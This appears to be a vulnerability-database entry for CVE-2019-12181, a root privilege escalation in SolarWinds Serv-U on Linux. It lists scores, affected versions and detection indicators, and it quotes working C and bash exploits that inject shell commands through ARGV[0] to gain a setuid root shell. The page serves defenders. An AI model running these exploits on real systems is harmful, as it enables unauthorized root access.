CVE-2019-12181
Published 2019-06-17
CVE-2019-12181: A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux.
Priority P275 · high · 8.8 (CVSS 3.1)
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 65.98% (99.2th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | serv-u_ftp_server | < 15.1.7 | 15.1.7 |
| solarwinds | serv-u_mft_server | < 15.1.7 | 15.1.7 |
Detection & IOCs (extracted from sources)
- The Serv-U binary at /usr/local/Serv-U/Serv-U is setuid root; monitor for it being executed with the -prepareinstallation flag by non-root, non-installer users, which is the trigger for exploitation.
- Monitor process execution for /usr/local/Serv-U/Serv-U being launched with ARGV[0] containing shell metacharacters (semicolons, quotes) — a hallmark of the exploit injecting commands via the process name.
- Alert on creation of setuid files in /tmp (e.g., /tmp/sh) shortly after Serv-U process execution, as the exploit copies /bin/bash there and sets the setuid bit.
- Detect use of bash 'exec -a' with a crafted ARGV[0] containing semicolons and quotes passed to the Serv-U binary, which is the mechanism used by all known exploit variants.
- Monitor for random-named hidden files (dot-prefixed, alphanumeric) created in writable directories (e.g., /tmp) with setuid root permissions, consistent with the Metasploit module's payload drop pattern.
- The vulnerability only affects Linux installations of Serv-U FTP Server prior to version 15.1.7; Windows installations are not affected.
- Exploitation requires local access (an existing shell or meterpreter session) on the target system; this is a local privilege escalation, not a remote code execution.
- The Metasploit module checks that the /tmp (or WritableDir) mount is not nosuid before proceeding; defenders should ensure /tmp is mounted nosuid as a mitigation.
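The two process-level checks above (non-root use of -prepareinstallation, and shell metacharacters in ARGV[0]) can be run over process-execution audit records. The following is an added example, not code from the page or from any of the cited sources; the record layout is a simplified auditd SYSCALL/EXECVE pair, and the sample records, reason labels and extra metacharacters are assumptions made for illustration.

```python
import re

SERVU = "/usr/local/Serv-U/Serv-U"  # binary path given on the page
# Assumption: the page names ';' and quotes; the rest are common shell metacharacters.
METACHARS = set(";\"'`|&$")

# Constructed, simplified auditd-style records (not real logs). auditd hex-encodes
# arguments containing quotes or spaces, so the first a0 is hex, not a quoted string.
SAMPLE = """\
type=SYSCALL msg=audit(1560760000.101:501): syscall=59 uid=1000 euid=0 exe="/usr/local/Serv-U/Serv-U"
type=EXECVE msg=audit(1560760000.101:501): argc=2 a0=223B69643B22 a1="-prepareinstallation"
type=SYSCALL msg=audit(1560760050.202:502): syscall=59 uid=0 euid=0 exe="/usr/local/Serv-U/Serv-U"
type=EXECVE msg=audit(1560760050.202:502): argc=2 a0="/usr/local/Serv-U/Serv-U" a1="-prepareinstallation"
"""

def decode(value):
    """Return an auditd field as text: quoted literal or bare hex."""
    if value.startswith('"'):
        return value.strip('"')
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value

def parse_events(text):
    """Merge the records of each audit event id into one field dict."""
    events = {}
    for line in text.splitlines():
        m = re.search(r"msg=audit\([\d.]+:(\d+)\):\s*(.*)", line)
        if m:
            fields = dict(re.findall(r'(\w+)=("[^"]*"|\S+)', m.group(2)))
            events.setdefault(m.group(1), {}).update(fields)
    return events

def findings(text):
    """Flag Serv-U executions that match the two process-level notes."""
    out = []
    for eid, f in sorted(parse_events(text).items()):
        if decode(f.get("exe", "")) != SERVU:
            continue
        argv = [decode(f.get(f"a{i}", "")) for i in range(int(f.get("argc", "0")))]
        reasons = []
        if "-prepareinstallation" in argv[1:] and f.get("uid") != "0":
            reasons.append("prepareinstallation-by-non-root")
        if argv and METACHARS & set(argv[0]):
            reasons.append("metachar-argv0")
        if reasons:
            out.append((eid, reasons))
    return out

print(findings(SAMPLE))
```

A rule that only string-matches quoted a0 values would miss the first event, because the audit subsystem writes that argument in hex.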
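CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |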
No detection rules found.
Exploit-DB
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)
exploitdb·2019-07-03·CVSS 8.8
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Serv-U FTP Server prepareinstallation Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on systems running
Serv-U FTP Server versions prior to 15.1.7.
The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
in a call to `system()`, without validation, when invoked with
the `-prepareinstallation` flag, resulting in command execution
with root privileges.
This module has been tested successfully on Serv-U FTP Server
version 15.1.6 (x64) on Debian 9.6 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Guy Lev
Exploit-DB
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
exploitdb·2019-06-18·CVSS 8.8
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}
Exploit-DB
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)
exploitdb·2019-01-13·CVSS 8.8
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
if ! test -u "/usr/local/Serv-U/Serv-U"; then
echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
exit 1
fi
echo "[*] Launching Serv-U ..."
/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
if ! test -u "/tmp/sh"; then
echo '[-] Failed'
/bin/rm "/tmp/sh"
exit 1
fi
echo '[+] Success:'
/bin/ls -la /tmp/sh
echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p
Metasploit
Serv-U FTP Server prepareinstallation Privilege Escalation
metasploit
This module attempts to gain root privileges on systems running Serv-U FTP Server versions prior to 15.1.7. The `Serv-U` executable is setuid `root`, and uses `ARGV[0]` in a call to `system()`, without validation, when invoked with the `-prepareinstallation` flag, resulting in command execution with root privileges. This module has been tested successfully on Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64).
http://packetstormsecurity.com/files/153333/Serv-U-FTP-Server-15.1.6-Privilege-Escalation.html
http://packetstormsecurity.com/files/153505/Serv-U-FTP-Server-prepareinstallation-Privilege-Escalation.html
https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm
https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems
Published: 2019-06-17